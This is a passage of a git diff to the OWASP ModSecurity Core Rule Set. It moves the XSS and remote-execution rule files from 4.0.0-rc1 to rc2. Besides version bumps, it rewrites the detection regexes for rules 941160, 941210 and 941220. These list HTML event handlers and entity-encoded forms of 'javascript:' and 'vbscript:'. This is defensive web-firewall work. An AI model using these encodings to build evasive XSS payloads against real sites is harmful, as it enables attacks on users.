@@ -188,7 +188,7 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME
     tag:'paranoia-level/2',\
     tag:'OWASP_CRS',\
     tag:'capec/1000/152/242',\
-    ver:'OWASP_CRS/4.0.0-rc1',\
+    ver:'OWASP_CRS/4.0.0-rc2',\
     severity:'CRITICAL',\
     multiMatch,\
     setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\
@@ -209,7 +209,7 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME
     tag:'paranoia-level/2',\
     tag:'OWASP_CRS',\
     tag:'capec/1000/152/242',\
-    ver:'OWASP_CRS/4.0.0-rc1',\
+    ver:'OWASP_CRS/4.0.0-rc2',\
     severity:'CRITICAL',\
     setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\
     setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'"
diff --git a/rules/@owasp_crs/REQUEST-941-APPLICATION-ATTACK-XSS.conf b/rules/@owasp_crs/REQUEST-941-APPLICATION-ATTACK-XSS.conf
index 6418ffe..15fa3e1 100644
--- a/rules/@owasp_crs/REQUEST-941-APPLICATION-ATTACK-XSS.conf
+++ b/rules/@owasp_crs/REQUEST-941-APPLICATION-ATTACK-XSS.conf
@@ -1,7 +1,7 @@
 # ------------------------------------------------------------------------
-# OWASP ModSecurity Core Rule Set ver.4.0.0-rc1
+# OWASP ModSecurity Core Rule Set ver.4.0.0-rc2
 # Copyright (c) 2006-2020 Trustwave and contributors. All rights reserved.
-# Copyright (c) 2021-2022 Core Rule Set project. All rights reserved.
+# Copyright (c) 2021-2023 Core Rule Set project. All rights reserved.
 #
 # The OWASP ModSecurity Core Rule Set is distributed under
 # Apache Software License (ASL) version 2
@@ -30,7 +30,7 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|REQUEST_H
     tag:'paranoia-level/1',\
     tag:'OWASP_CRS',\
     tag:'capec/1000/152/242',\
-    ver:'OWASP_CRS/4.0.0-rc1',\
+    ver:'OWASP_CRS/4.0.0-rc2',\
     severity:'CRITICAL',\
     setvar:'tx.xss_score=+%{tx.critical_anomaly_score}',\
     setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
@@ -49,7 +49,7 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|REQUEST_F
     tag:'paranoia-level/1',\
     tag:'OWASP_CRS',\
     tag:'capec/1000/152/242',\
-    ver:'OWASP_CRS/4.0.0-rc1',\
+    ver:'OWASP_CRS/4.0.0-rc2',\
     severity:'CRITICAL',\
     setvar:'tx.xss_score=+%{tx.critical_anomaly_score}',\
     setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
@@ -68,7 +68,7 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|REQUEST_H
     tag:'paranoia-level/1',\
     tag:'OWASP_CRS',\
     tag:'capec/1000/152/242',\
-    ver:'OWASP_CRS/4.0.0-rc1',\
+    ver:'OWASP_CRS/4.0.0-rc2',\
     severity:'CRITICAL',\
     setvar:'tx.xss_score=+%{tx.critical_anomaly_score}',\
     setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
@@ -87,11 +87,11 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|REQUEST_H
     tag:'paranoia-level/1',\
     tag:'OWASP_CRS',\
     tag:'capec/1000/152/242',\
-    ver:'OWASP_CRS/4.0.0-rc1',\
+    ver:'OWASP_CRS/4.0.0-rc2',\
     severity:'CRITICAL',\
     setvar:'tx.xss_score=+%{tx.critical_anomaly_score}',\
     setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
-SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|REQUEST_HEADERS:User-Agent|REQUEST_HEADERS:Referer|ARGS_NAMES|ARGS|REQUEST_FILENAME|XML:/* "@rx (?i)<[^0-9<>A-Z_a-z]*(?:[^\s\v\"'<>]*:)?[^0-9<>A-Z_a-z]*[^0-9A-Z_a-z]*?(?:s[^0-9A-Z_a-z]*?(?:c[^0-9A-Z_a-z]*?r[^0-9A-Z_a-z]*?i[^0-9A-Z_a-z]*?p[^0-9A-Z_a-z]*?t|t[^0-9A-Z_a-z]*?y[^0-9A-Z_a-z]*?l[^0-9A-Z_a-z]*?e|v[^0-9A-Z_a-z]*?g|e[^0-9A-Z_a-z]*?t[^0-9>A-Z_a-z])|f[^0-9A-Z_a-z]*?o[^0-9A-Z_a-z]*?r[^0-9A-Z_a-z]*?m|m[^0-9A-Z_a-z]*?(?:a[^0-9A-Z_a-z]*?r[^0-9A-Z_a-z]*?q[^0-9A-Z_a-z]*?u[^0-9A-Z_a-z]*?e[^0-9A-Z_a-z]*?e|e[^0-9A-Z_a-z]*?t[^0-9A-Z_a-z]*?a[^0-9>A-Z_a-z])|(?:l[^0-9A-Z_a-z]*?i[^0-9A-Z_a-z]*?n[^0-9A-Z_a-z]*?k|o[^0-9A-Z_a-z]*?b[^0-9A-Z_a-z]*?j[^0-9A-Z_a-z]*?e[^0-9A-Z_a-z]*?c[^0-9A-Z_a-z]*?t|e[^0-9A-Z_a-z]*?m[^0-9A-Z_a-z]*?b[^0-9A-Z_a-z]*?e[^0-9A-Z_a-z]*?d|a[^0-9A-Z_a-z]*?(?:p[^0-9A-Z_a-z]*?p[^0-9A-Z_a-z]*?l[^0-9A-Z_a-z]*?e[^0-9A-Z_a-z]*?t|u[^0-9A-Z_a-z]*?d[^0-9A-Z_a-z]*?i[^0-9A-Z_a-z]*?o|n[^0-9A-Z_a-z]*?i[^0-9A-Z_a-z]*?m[^0-9A-Z_a-z]*?a[^0-9A-Z_a-z]*?t[^0-9A-Z_a-z]*?e)|p[^0-9A-Z_a-z]*?a[^0-9A-Z_a-z]*?r[^0-9A-Z_a-z]*?a[^0-9A-Z_a-z]*?m|i?[^0-9A-Z_a-z]*?f[^0-9A-Z_a-z]*?r[^0-9A-Z_a-z]*?a[^0-9A-Z_a-z]*?m[^0-9A-Z_a-z]*?e|b[^0-9A-Z_a-z]*?(?:a[^0-9A-Z_a-z]*?s[^0-9A-Z_a-z]*?e|o[^0-9A-Z_a-z]*?d[^0-9A-Z_a-z]*?y|i[^0-9A-Z_a-z]*?n[^0-9A-Z_a-z]*?d[^0-9A-Z_a-z]*?i[^0-9A-Z_a-z]*?n[^0-9A-Z_a-z]*?g[^0-9A-Z_a-z]*?s)|i[^0-9A-Z_a-z]*?m[^0-9A-Z_a-z]*?a?[^0-9A-Z_a-z]*?g[^0-9A-Z_a-z]*?e?|v[^0-9A-Z_a-z]*?i[^0-9A-Z_a-z]*?d[^0-9A-Z_a-z]*?e[^0-9A-Z_a-z]*?o)[^0-9>A-Z_a-z])|(?:<[0-9A-Z_a-z].*[\s\v/]|[\"'](?:.*[\s\v/])?)(?:background|formaction|lowsrc|on(?:a(?:bort|ctivate|d(?:apteradded|dtrack)|fter(?:print|(?:scriptexecu|upda)te)|lerting|n(?:imation(?:end|iteration|start)|tennastatechange)|ppcommand|udio(?:end|process|start))|b(?:e(?:fore(?:(?:(?:de)?activa|scriptexecu)te|c(?:opy|ut)|editfocus|p(?:aste|rint)|u(?:nload|pdate))|gin(?:Event)?)|l(?:ocked|ur)|oun(?:ce|dary)|roadcast|usy)|c(?:a(?:(?:ch|llschang)ed|nplay(?:through)?|rdstatechange)|(?:ell|fstate)change|h(?:a(?:rging(?:time)?cha)?nge|ecking)|l(?:ick|ose)|o(?:m(?:mand(?:update)?|p(?:lete|osition(?:end|start|update)))|n(?:nect(?:ed|ing)|t(?:extmenu|rolselect))|py)|u(?:echange|t))|d(?:ata(?:(?:availabl|chang)e|error|setc(?:hanged|omplete))|blclick|e(?:activate|livery(?:error|success)|vice(?:found|light|(?:mo|orienta)tion|proximity))|i(?:aling|s(?:abled|c(?:hargingtimechange|onnect(?:ed|ing))))|o(?:m(?:a(?:ctivate|ttrmodified)|(?:characterdata|subtree)modified|focus(?:in|out)|mousescroll|node(?:inserted(?:intodocument)?|removed(?:fromdocument)?))|wnloading)|r(?:ag(?:drop|e(?:n(?:d|ter)|xit)|(?:gestur|leav)e|over|start)|op)|urationchange)|e(?:mptied|n(?:abled|d(?:ed|Event)?|ter)|rror(?:update)?|xit)|f(?:ailed|i(?:lterchange|nish)|o(?:cus(?:in|out)?|rm(?:change|input)))|g(?:amepad(?:axismove|button(?:down|up)|(?:dis)?connected)|et)|h(?:ashchange|e(?:adphoneschange|l[dp])|olding)|i(?:cc(?:cardlockerror|infochange)|n(?:coming|put|valid))|key(?:down|press|up)|l(?:evelchange|o(?:ad(?:e(?:d(?:meta)?data|nd)|start)?|secapture)|y)|m(?:ark|essage|o(?:use(?:down|enter|(?:lea|mo)ve|o(?:ut|ver)|up|wheel)|ve(?:end|start)?|z(?:a(?:fterpaint|udioavailable)|(?:beforeresiz|orientationchang|t(?:apgestur|imechang))e|(?:edgeui(?:c(?:ancel|omplet)|start)e|network(?:down|up)loa)d|fullscreen(?:change|error)|m(?:agnifygesture(?:start|update)?|ouse(?:hittest|pixelscroll))|p(?:ointerlock(?:change|error)|resstapgesture)|rotategesture(?:start|update)?|s(?:crolledareachanged|wipegesture(?:end|start|update)?))))|no(?:match|update)|o(?:(?:bsolet|(?:ff|n)lin)e|pen|verflow(?:changed)?)|p(?:a(?:ge(?:hide|show)|int|(?:st|us)e)|lay(?:ing)?|op(?:state|up(?:hid(?:den|ing)|show(?:ing|n)))|ro(?:gress|pertychange))|r(?:atechange|e(?:adystatechange|ceived|movetrack|peat(?:Event)?|quest|s(?:et|ize|u(?:lt|m(?:e|ing)))|trieving)|ow(?:e(?:nter|xit)|s(?:delete|inserted)))|s(?:croll|e(?:ek(?:complete|ed|ing)|lect(?:start)?|n(?:ding|t)|t)|how|(?:ound|peech)(?:end|start)|t(?:a(?:lled|rt|t(?:echange|uschanged))|k(?:comma|sessione)nd|op)|u(?:bmit|ccess|spend)|vg(?:abort|error|(?:un)?load|resize|scroll|zoom))|t(?:ext|ime(?:out|update)|ouch(?:cancel|en(?:d|ter)|(?:lea|mo)ve|start)|ransition(?:cancel|end|run))|u(?:n(?:derflow|load)|p(?:dateready|gradeneeded)|s(?:erproximity|sdreceived))|v(?:ersion|o(?:ic|lum)e)change|w(?:a(?:it|rn)ing|heel)|zoom)|ping|s(?:rc|tyle))[\x08-\n\f-\r ]*?=" \
+SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|REQUEST_HEADERS:User-Agent|REQUEST_HEADERS:Referer|ARGS_NAMES|ARGS|REQUEST_FILENAME|XML:/* "@rx (?i)<[^0-9<>A-Z_a-z]*(?:[^\s\v\"'<>]*:)?[^0-9<>A-Z_a-z]*[^0-9A-Z_a-z]*?(?:s[^0-9A-Z_a-z]*?(?:c[^0-9A-Z_a-z]*?r[^0-9A-Z_a-z]*?i[^0-9A-Z_a-z]*?p[^0-9A-Z_a-z]*?t|t[^0-9A-Z_a-z]*?y[^0-9A-Z_a-z]*?l[^0-9A-Z_a-z]*?e|v[^0-9A-Z_a-z]*?g|e[^0-9A-Z_a-z]*?t[^0-9>A-Z_a-z])|f[^0-9A-Z_a-z]*?o[^0-9A-Z_a-z]*?r[^0-9A-Z_a-z]*?m|m[^0-9A-Z_a-z]*?(?:a[^0-9A-Z_a-z]*?r[^0-9A-Z_a-z]*?q[^0-9A-Z_a-z]*?u[^0-9A-Z_a-z]*?e[^0-9A-Z_a-z]*?e|e[^0-9A-Z_a-z]*?t[^0-9A-Z_a-z]*?a[^0-9>A-Z_a-z])|(?:l[^0-9A-Z_a-z]*?i[^0-9A-Z_a-z]*?n[^0-9A-Z_a-z]*?k|o[^0-9A-Z_a-z]*?b[^0-9A-Z_a-z]*?j[^0-9A-Z_a-z]*?e[^0-9A-Z_a-z]*?c[^0-9A-Z_a-z]*?t|e[^0-9A-Z_a-z]*?m[^0-9A-Z_a-z]*?b[^0-9A-Z_a-z]*?e[^0-9A-Z_a-z]*?d|a[^0-9A-Z_a-z]*?(?:p[^0-9A-Z_a-z]*?p[^0-9A-Z_a-z]*?l[^0-9A-Z_a-z]*?e[^0-9A-Z_a-z]*?t|u[^0-9A-Z_a-z]*?d[^0-9A-Z_a-z]*?i[^0-9A-Z_a-z]*?o|n[^0-9A-Z_a-z]*?i[^0-9A-Z_a-z]*?m[^0-9A-Z_a-z]*?a[^0-9A-Z_a-z]*?t[^0-9A-Z_a-z]*?e)|p[^0-9A-Z_a-z]*?a[^0-9A-Z_a-z]*?r[^0-9A-Z_a-z]*?a[^0-9A-Z_a-z]*?m|i?[^0-9A-Z_a-z]*?f[^0-9A-Z_a-z]*?r[^0-9A-Z_a-z]*?a[^0-9A-Z_a-z]*?m[^0-9A-Z_a-z]*?e|b[^0-9A-Z_a-z]*?(?:a[^0-9A-Z_a-z]*?s[^0-9A-Z_a-z]*?e|o[^0-9A-Z_a-z]*?d[^0-9A-Z_a-z]*?y|i[^0-9A-Z_a-z]*?n[^0-9A-Z_a-z]*?d[^0-9A-Z_a-z]*?i[^0-9A-Z_a-z]*?n[^0-9A-Z_a-z]*?g[^0-9A-Z_a-z]*?s)|i[^0-9A-Z_a-z]*?m[^0-9A-Z_a-z]*?a?[^0-9A-Z_a-z]*?g[^0-9A-Z_a-z]*?e?|v[^0-9A-Z_a-z]*?i[^0-9A-Z_a-z]*?d[^0-9A-Z_a-z]*?e[^0-9A-Z_a-z]*?o)[^0-9>A-Z_a-z])|(?:<[0-9A-Z_a-z].*[\s\v/]|[\"'](?:.*[\s\v/])?)(?:background|formaction|lowsrc|on(?:a(?:bort|ctivate|d(?:apteradded|dtrack)|fter(?:print|(?:scriptexecu|upda)te)|lerting|n(?:imation(?:cancel|end|iteration|start)|tennastatechange)|ppcommand|u(?:dio(?:end|process|start)|xclick))|b(?:e(?:fore(?:(?:(?:(?:de)?activa|scriptexecu)t|toggl)e|c(?:opy|ut)|editfocus|input|p(?:aste|rint)|u(?:nload|pdate))|gin(?:Event)?)|l(?:ocked|ur)|oun(?:ce|dary)|roadcast|usy)|c(?:a(?:(?:ch|llschang)ed|nplay(?:through)?|rdstatechange)|(?:ell|fstate)change|h(?:a(?:rging(?:time)?cha)?nge|ecking)|l(?:ick|ose)|o(?:m(?:mand(?:update)?|p(?:lete|osition(?:end|start|update)))|n(?:nect(?:ed|ing)|t(?:extmenu|rolselect))|py)|u(?:echange|t))|d(?:ata(?:(?:availabl|chang)e|error|setc(?:hanged|omplete))|blclick|e(?:activate|livery(?:error|success)|vice(?:found|light|(?:mo|orienta)tion|proximity))|i(?:aling|s(?:abled|c(?:hargingtimechange|onnect(?:ed|ing))))|o(?:m(?:a(?:ctivate|ttrmodified)|(?:characterdata|subtree)modified|focus(?:in|out)|mousescroll|node(?:inserted(?:intodocument)?|removed(?:fromdocument)?))|wnloading)|r(?:ag(?:drop|e(?:n(?:d|ter)|xit)|(?:gestur|leav)e|over|start)|op)|urationchange)|e(?:mptied|n(?:abled|d(?:ed|Event)?|ter)|rror(?:update)?|xit)|f(?:ailed|i(?:lterchange|nish)|o(?:cus(?:in|out)?|rm(?:change|input))|ullscreenchange)|g(?:amepad(?:axismove|button(?:down|up)|(?:dis)?connected)|et)|h(?:ashchange|e(?:adphoneschange|l[dp])|olding)|i(?:cc(?:cardlockerror|infochange)|n(?:coming|put|valid))|key(?:down|press|up)|l(?:evelchange|o(?:ad(?:e(?:d(?:meta)?data|nd)|start)?|secapture)|y)|m(?:ark|essage|o(?:use(?:down|enter|(?:lea|mo)ve|o(?:ut|ver)|up|wheel)|ve(?:end|start)?|z(?:a(?:fterpaint|udioavailable)|(?:beforeresiz|orientationchang|t(?:apgestur|imechang))e|(?:edgeui(?:c(?:ancel|omplet)|start)e|network(?:down|up)loa)d|fullscreen(?:change|error)|m(?:agnifygesture(?:start|update)?|ouse(?:hittest|pixelscroll))|p(?:ointerlock(?:change|error)|resstapgesture)|rotategesture(?:start|update)?|s(?:crolledareachanged|wipegesture(?:end|start|update)?))))|no(?:match|update)|o(?:(?:bsolet|(?:ff|n)lin)e|pen|verflow(?:changed)?)|p(?:a(?:ge(?:hide|show)|int|(?:st|us)e)|lay(?:ing)?|o(?:inter(?:down|enter|(?:(?:lea|mo)v|rawupdat)e|o(?:ut|ver)|up)|p(?:state|up(?:hid(?:den|ing)|show(?:ing|n))))|ro(?:gress|pertychange))|r(?:atechange|e(?:adystatechange|ceived|movetrack|peat(?:Event)?|quest|s(?:et|ize|u(?:lt|m(?:e|ing)))|trieving)|ow(?:e(?:nter|xit)|s(?:delete|inserted)))|s(?:croll(?:end)?|e(?:arch|ek(?:complete|ed|ing)|lect(?:ionchange|start)?|n(?:ding|t)|t)|how|(?:ound|peech)(?:end|start)|t(?:a(?:lled|rt|t(?:echange|uschanged))|k(?:comma|sessione)nd|op)|u(?:bmit|ccess|spend)|vg(?:abort|error|(?:un)?load|resize|scroll|zoom))|t(?:ext|ime(?:out|update)|o(?:ggle|uch(?:cancel|en(?:d|ter)|(?:lea|mo)ve|start))|ransition(?:cancel|end|run|start))|u(?:n(?:derflow|handledrejection|load)|p(?:dateready|gradeneeded)|s(?:erproximity|sdreceived))|v(?:ersion|o(?:ic|lum)e)change|w(?:a(?:it|rn)ing|ebkit(?:animation(?:end|iteration|start)|transitionend)|heel)|zoom)|ping|s(?:rc|tyle))[\x08-\n\f-\r ]*?=" \
     "id:941160,\
     phase:2,\
     block,\
@@ -106,7 +106,7 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|REQUEST_H
     tag:'paranoia-level/1',\
     tag:'OWASP_CRS',\
     tag:'capec/1000/152/242',\
-    ver:'OWASP_CRS/4.0.0-rc1',\
+    ver:'OWASP_CRS/4.0.0-rc2',\
     severity:'CRITICAL',\
     setvar:'tx.xss_score=+%{tx.critical_anomaly_score}',\
     setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
@@ -125,7 +125,7 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|REQUEST_H
     tag:'paranoia-level/1',\
     tag:'OWASP_CRS',\
     tag:'capec/1000/152/242',\
-    ver:'OWASP_CRS/4.0.0-rc1',\
+    ver:'OWASP_CRS/4.0.0-rc2',\
     severity:'CRITICAL',\
     setvar:'tx.xss_score=+%{tx.critical_anomaly_score}',\
     setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
@@ -144,7 +144,7 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME
     tag:'paranoia-level/1',\
     tag:'OWASP_CRS',\
     tag:'capec/1000/152/242',\
-    ver:'OWASP_CRS/4.0.0-rc1',\
+    ver:'OWASP_CRS/4.0.0-rc2',\
     severity:'CRITICAL',\
     setvar:'tx.xss_score=+%{tx.critical_anomaly_score}',\
     setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
@@ -163,7 +163,7 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME
     tag:'paranoia-level/1',\
     tag:'OWASP_CRS',\
     tag:'capec/1000/152/242',\
-    ver:'OWASP_CRS/4.0.0-rc1',\
+    ver:'OWASP_CRS/4.0.0-rc2',\
     severity:'CRITICAL',\
     setvar:'tx.xss_score=+%{tx.critical_anomaly_score}',\
     setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
@@ -182,11 +182,11 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME
     tag:'paranoia-level/1',\
     tag:'OWASP_CRS',\
     tag:'capec/1000/152/242',\
-    ver:'OWASP_CRS/4.0.0-rc1',\
+    ver:'OWASP_CRS/4.0.0-rc2',\
     severity:'CRITICAL',\
     setvar:'tx.xss_score=+%{tx.critical_anomaly_score}',\
     setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
-SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|REQUEST_FILENAME|XML:/* "@rx (?i:(?:j|&#x?0*(?:74|4A|106|6A);?)(?:\t|\n|\r|&(?:#x?0*(?:9|13|10|A|D);?|tab;|newline;))*(?:a|&#x?0*(?:65|41|97|61);?)(?:\t|\n|\r|&(?:#x?0*(?:9|13|10|A|D);?|tab;|newline;))*(?:v|&#x?0*(?:86|56|118|76);?)(?:\t|\n|\r|&(?:#x?0*(?:9|13|10|A|D);?|tab;|newline;))*(?:a|&#x?0*(?:65|41|97|61);?)(?:\t|\n|\r|&(?:#x?0*(?:9|13|10|A|D);?|tab;|newline;))*(?:s|&#x?0*(?:83|53|115|73);?)(?:\t|\n|\r|&(?:#x?0*(?:9|13|10|A|D);?|tab;|newline;))*(?:c|&#x?0*(?:67|43|99|63);?)(?:\t|\n|\r|&(?:#x?0*(?:9|13|10|A|D);?|tab;|newline;))*(?:r|&#x?0*(?:82|52|114|72);?)(?:\t|\n|\r|&(?:#x?0*(?:9|13|10|A|D);?|tab;|newline;))*(?:i|&#x?0*(?:73|49|105|69);?)(?:\t|\n|\r|&(?:#x?0*(?:9|13|10|A|D);?|tab;|newline;))*(?:p|&#x?0*(?:80|50|112|70);?)(?:\t|\n|\r|&(?:#x?0*(?:9|13|10|A|D);?|tab;|newline;))*(?:t|&#x?0*(?:84|54|116|74);?)(?:\t|\n|\r|&(?:#x?0*(?:9|13|10|A|D);?|tab;|newline;))*(?::|&(?:#x?0*(?:58|3A);?|colon;)).)" \
+SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|REQUEST_FILENAME|XML:/* "@rx (?i)(?:j|&#(?:0*(?:74|106)|x0*[46]A);)(?:[\t-\n\r]|&(?:#(?:0*(?:9|1[03])|x0*[AD]);?|(?:tab|newline);))*(?:a|&#(?:0*(?:65|97)|x0*[46]1);)(?:[\t-\n\r]|&(?:#(?:0*(?:9|1[03])|x0*[AD]);?|(?:tab|newline);))*(?:v|&#(?:0*(?:86|118)|x0*[57]6);)(?:[\t-\n\r]|&(?:#(?:0*(?:9|1[03])|x0*[AD]);?|(?:tab|newline);))*(?:a|&#(?:0*(?:65|97)|x0*[46]1);)(?:[\t-\n\r]|&(?:#(?:0*(?:9|1[03])|x0*[AD]);?|(?:tab|newline);))*(?:s|&#(?:0*(?:115|83)|x0*[57]3);)(?:[\t-\n\r]|&(?:#(?:0*(?:9|1[03])|x0*[AD]);?|(?:tab|newline);))*(?:c|&#(?:x0*[46]3|0*(?:99|67));)(?:[\t-\n\r]|&(?:#(?:0*(?:9|1[03])|x0*[AD]);?|(?:tab|newline);))*(?:r|&#(?:x0*[57]2|0*(?:114|82));)(?:[\t-\n\r]|&(?:#(?:0*(?:9|1[03])|x0*[AD]);?|(?:tab|newline);))*(?:i|&#(?:x0*[46]9|0*(?:105|73));)(?:[\t-\n\r]|&(?:#(?:0*(?:9|1[03])|x0*[AD]);?|(?:tab|newline);))*(?:p|&#(?:x0*[57]0|0*(?:112|80));)(?:[\t-\n\r]|&(?:#(?:0*(?:9|1[03])|x0*[AD]);?|(?:tab|newline);))*(?:t|&#(?:x0*[57]4|0*(?:116|84));)(?:[\t-\n\r]|&(?:#(?:0*(?:9|1[03])|x0*[AD]);?|(?:tab|newline);))*(?::|&(?:#(?:0*58|x0*3A);?|colon;))." \
     "id:941210,\
     phase:2,\
     block,\
@@ -201,11 +201,11 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME
     tag:'paranoia-level/1',\
     tag:'OWASP_CRS',\
     tag:'capec/1000/152/242',\
-    ver:'OWASP_CRS/4.0.0-rc1',\
+    ver:'OWASP_CRS/4.0.0-rc2',\
     severity:'CRITICAL',\
     setvar:'tx.xss_score=+%{tx.critical_anomaly_score}',\
     setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
-SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|REQUEST_FILENAME|XML:/* "@rx (?i:(?:v|&#x?0*(?:86|56|118|76);?)(?:\t|&(?:#x?0*(?:9|13|10|A|D);?|tab;|newline;))*(?:b|&#x?0*(?:66|42|98|62);?)(?:\t|&(?:#x?0*(?:9|13|10|A|D);?|tab;|newline;))*(?:s|&#x?0*(?:83|53|115|73);?)(?:\t|&(?:#x?0*(?:9|13|10|A|D);?|tab;|newline;))*(?:c|&#x?0*(?:67|43|99|63);?)(?:\t|&(?:#x?0*(?:9|13|10|A|D);?|tab;|newline;))*(?:r|&#x?0*(?:82|52|114|72);?)(?:\t|&(?:#x?0*(?:9|13|10|A|D);?|tab;|newline;))*(?:i|&#x?0*(?:73|49|105|69);?)(?:\t|&(?:#x?0*(?:9|13|10|A|D);?|tab;|newline;))*(?:p|&#x?0*(?:80|50|112|70);?)(?:\t|&(?:#x?0*(?:9|13|10|A|D);?|tab;|newline;))*(?:t|&#x?0*(?:84|54|116|74);?)(?:\t|&(?:#x?0*(?:9|13|10|A|D);?|tab;|newline;))*(?::|&(?:#x?0*(?:58|3A);?|colon;)).)" \
+SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|REQUEST_FILENAME|XML:/* "@rx (?i)(?:v|&#(?:0*8|x0*5)[36];)(?:[\t-\n\r]|&(?:#(?:0*(?:9|1[03])|x0*[AD]);?|(?:tab|newline);))*(?:b|&#(?:0*6[26]|x0*(?:98|42));)(?:[\t-\n\r]|&(?:#(?:0*(?:9|1[03])|x0*[AD]);?|(?:tab|newline);))*(?:s|&#(?:0*(?:115|83)|x0*[57]3);)(?:[\t-\n\r]|&(?:#(?:0*(?:9|1[03])|x0*[AD]);?|(?:tab|newline);))*(?:c|&#(?:x0*[46]3|0*(?:99|67));)(?:[\t-\n\r]|&(?:#(?:0*(?:9|1[03])|x0*[AD]);?|(?:tab|newline);))*(?:r|&#(?:x0*[57]2|0*(?:114|82));)(?:[\t-\n\r]|&(?:#(?:0*(?:9|1[03])|x0*[AD]);?|(?:tab|newline);))*(?:i|&#(?:x0*[46]9|0*(?:105|73));)(?:[\t-\n\r]|&(?:#(?:0*(?:9|1[03])|x0*[AD]);?|(?:tab|newline);))*(?:p|&#(?:x0*[57]0|0*(?:112|80));)(?:[\t-\n\r]|&(?:#(?:0*(?:9|1[03])|x0*[AD]);?|(?:tab|newline);))*(?:t|&#(?:x0*[57]4|0*(?:116|84));)(?:[\t-\n\r]|&(?:#(?:0*(?:9|1[03])|x0*[AD]);?|(?:tab|newline);))*(?::|&(?:#(?:0*58|x0*3A);?|colon;))." \
     "id:941220,\
     phase:2,\
     block,\
@@ -220,7 +220,7 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME
     tag:'paranoia-level/1',\
     tag:'OWASP_CRS',\
     tag:'capec/1000/152/242',\
-    ver:'OWASP_CRS/4.0.0-rc1',\
+    ver:'OWASP_CRS/4.0.0-rc2',\
     severity:'CRITICAL',\
     setvar:'tx.xss_score=+%{tx.critical_anomaly_score}',\
     setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
@@ -239,7 +239,7 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME
     tag:'paranoia-level/1',\
     tag:'OWASP_CRS',\
     tag:'capec/1000/152/242',\
-    ver:'OWASP_CRS/4.0.0-rc1',\
+    ver:'OWASP_CRS/4.0.0-rc2',\
     severity:'CRITICAL',\
     setvar:'tx.xss_score=+%{tx.critical_anomaly_score}',\
     setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
@@ -258,7 +258,7 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME
     tag:'paranoia-level/1',\
     tag:'OWASP_CRS',\
     tag:'capec/1000/152/242',\
-    ver:'OWASP_CRS/4.0.0-rc1',\
+    ver:'OWASP_CRS/4.0.0-rc2',\
     severity:'CRITICAL',\
     setvar:'tx.xss_score=+%{tx.critical_anomaly_score}',\
     setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
@@ -277,7 +277,7 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME
     tag:'paranoia-level/1',\
     tag:'OWASP_CRS',\
     tag:'capec/1000/152/242',\
-    ver:'OWASP_CRS/4.0.0-rc1',\
+    ver:'OWASP_CRS/4.0.0-rc2',\
     severity:'CRITICAL',\
     setvar:'tx.xss_score=+%{tx.critical_anomaly_score}',\
     setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
@@ -296,7 +296,7 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME
     tag:'paranoia-level/1',\
     tag:'OWASP_CRS',\
